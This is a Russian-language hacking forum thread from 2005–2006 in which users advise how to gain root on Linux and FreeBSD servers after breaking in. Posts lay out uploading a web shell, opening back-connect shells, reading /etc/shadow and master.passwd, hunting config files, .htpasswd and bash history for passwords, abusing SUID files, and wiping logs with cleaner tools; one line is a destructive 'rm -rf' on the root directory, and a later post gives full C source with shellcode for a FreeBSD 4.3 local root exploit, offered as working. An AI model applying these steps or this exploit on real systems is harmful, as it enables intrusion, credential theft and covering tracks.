PDA

Просмотр полной версии : Помогите Взять root.


w4rd3n
12.11.2005, 13:01
Короче как брать рута на Фряхе Линюксе...
Опишите все по шажкам... Что в первую очередь надо посмотреть где могут быть пароли в часности интрересует ssh.

БольшОЕ Спасибо Прозьба тем кто не знает не писать.!

m0nzt3r
12.11.2005, 14:02
так так=) отвечаю все подробно...
сначала заливаешь шелл , потом пробиваешь к консоли (бек коннект, бинд) после того как пробился к консоли то есть ты уже в системе набираешь uname -a если линуха + кернел НЕ 2005 то можно попробывать взять паблик сплойтами которые лежат web-hack.ru/exploit , а перед всем этим не забываем проверять на наличие компилятора и качалок (which wget curl lynx fetch links get, which gcc cc) вот так.. а пассы от SSH бывают в /etc/shadow на всякий случай можешь попробвать как зашел в систему cat /etc/shadow но это далеко не каждый раз случается=) так что качаешь сплойты с сайта компилишь запускаешь.. чего непонятно спрашивай не стесняйся!))

qBiN
12.11.2005, 15:30
ухахаха :)))))))))))))))
/etc/shadowЭто в линуксе, в фряхе master.passwd насколько я помню))
Под фряху не припомню ядерных експлойтов,так что все зависит от демонов,хотя все оч. самнительно...
Бывает часто плохо права выставленны...

w4rd3n
12.11.2005, 15:39
Еще как бы в развитие темы первой командой ИМХо жолжна быть who

kot777
12.11.2005, 19:57
Ещё неплохо поискать config.inc.php очень часто пароль на мускул и ssh совпадают.

m0nzt3r
12.11.2005, 21:38
qBiN у мя например такое было=))
Еще как бы в развитие темы первой командой ИМХо жолжна быть who
ну это рута не касается... это для соблюдения безопасности=)

w4rd3n
12.11.2005, 22:22
Народ кто готов Дайю шалл ip:порт вы снимаете видео по поиску всего что описали...
Исход не имееть значения.... как вам? кто готов в асю 30003111

w4rd3n
13.11.2005, 00:00
Вообщем вы мне нечего нового не сказали...

Вот собственно мои знания...

$pwd;id;ls -la
$who
$uname -a
$which gcc
$which wget
$which lynx
$which fetch
$ps -ax

$find / -type f -perm -04000 -ls // поиск файлов с sqid битом
$find / -type f -name "config*" //поиск по маске всех файлов с именем config*(манипулиренм названиями.
$find . -type f -name "config*" тоже самое токо ищем директории.
$find / -type f -name .htpasswd // без коментариев.
$find / -type f -name .bash_history // ищем историю bash оболочки.
$netstat -an | grep -i listen // без коментариев.
$find / -type d -perm 0777 //ищем папки с правами на запись.
$sysctl -a | grep version // более точный способ определения OS
$cat /proc/version // Версия ядра.
$cat /etc/syslog.conf // смотрим syslog
$cat /etc/hosts // смотрим виртуальные хосты.
$locate httpd.conf // без коментариев.
$cd /; rm -rf // :)

Вот собственно все что хотел вам сказать...
Меня еще интересует вопросы

1)Что делать с фалами которые имеют sqid биты?
2)Где еще могу быть пароли ваши линей взлома.
3)Еще команды блоки команд.
4)Да еще чистка логов...

Вообщем меня интересует взлом системы без применения сплойтов.

qBiN
13.11.2005, 06:08
хихихихи)))
Ты что копировал из-какого нить шелла с алиасами?
Нах тебе искать то что ты не понимаешь:?:
sqid suid биты например. Вопще поставь себе линукс,мож выучиешь что-нибуть))))
sqid suid-права файла выполняться от прав рута они чем-то отличаются только хз чем :)

k1b0rg
13.11.2005, 12:14
логи почистить ванишем, чистит хорошо но медленно.

w4rd3n
13.11.2005, 12:39
хихихихи)))
Ты что копировал из-какого нить шелла с алиасами?
Нах тебе искать то что ты не понимаешь:?:
sqid suid биты например. Вопще поставь себе линукс,мож выучиешь что-нибуть))))
sqid suid-права файла выполняться от прав рута они чем-то отличаются только хз чем :)
Да...
Я по твоему не знал что sqid биты запушены от рута и имеют его привелегии.
Я Спрашивал про использывание их для получения рута.!
Насчет алиасов когда я используй веб шел мне свойственно запоминать команды если ты их сам придумываешь из головы из своей а не где не смотришь или узнаешь то извини...

Лан погорячился...

w4rd3n
13.11.2005, 12:40
логи почистить ванишем, чистит хорошо но медленно.
Я имею ввиду ручками...

gr3yh47
30.11.2005, 22:47
Нах ручками так быстрее.
как предложил k1b0rg
или от RST
stelchem

Desr0w
14.04.2006, 07:54
ухахаха :)))))))))))))))
Это в линуксе, в фряхе master.passwd насколько я помню))
Под фряху не припомню ядерных експлойтов,так что все зависит от демонов,хотя все оч. самнительно...
Бывает часто плохо права выставленны...

Хех,ты забыл про один бронебойный сплойт.
Кому надо...Сплойт рабочий,бага актуальна....

/*
FreeBSD 4.3 local root exploit using shared signals.
Written by Georgi Guninski http://www.guninski.com
*/

#include <stdio.h>
#include <signal.h>
#include <unistd.h>
int vv1;

#define MYSIG SIGINT


//exec "/tmp/sh", shellcode gotten from the internet and modified
unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x50\x50\xb0\xb7\xcd\x80"
"\x31\xc0\x50\x50\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80\x90\x90\x90";

typedef (*PROG)();
extern char **environ;

int main(int ac,char **av)
{
int pid;
//(*(PROG)bsdshell)();
if(!(vv1=getenv("vv")))
{
setenv("vv",bsdshell,1);
if(!execle(av[0],"vv",NULL,environ))
{
perror("weird exec");
exit(1);
}
}

printf("vvfreebsd. Written by Georgi Guninski\n");
printf("shall jump to %x\n",vv1);

if(!(pid=rfork(RFPROC|RFSIGSHARE)))
{
printf("child=%d\n",getpid());
// /usr/bin/login and rlogin work for me. ping gives nonsuid shell
// if(!execl("/usr/bin/rlogin","rlogin","localhost",0))
if(!execl("/usr/bin/login","login",0))
{
perror("exec setuid failed");
exit(2);
};
}
sleep(2);
signal(MYSIG,(sig_t)vv1);
sleep(2);
kill(pid,MYSIG);
printf("done\n");
while(42);
}

virgoz
14.04.2006, 08:51
Desr0w, взлом укртелекома? ;)

Desr0w
14.04.2006, 08:59
Какого телекома:)

qBiN
14.04.2006, 16:20
Хех,ты забыл про один бронебойный сплойт.Дату моего сообщения посмотри.

D1mOn
14.04.2006, 16:40
блин где вы этот топик откапали! хватит уже древние поднимать)))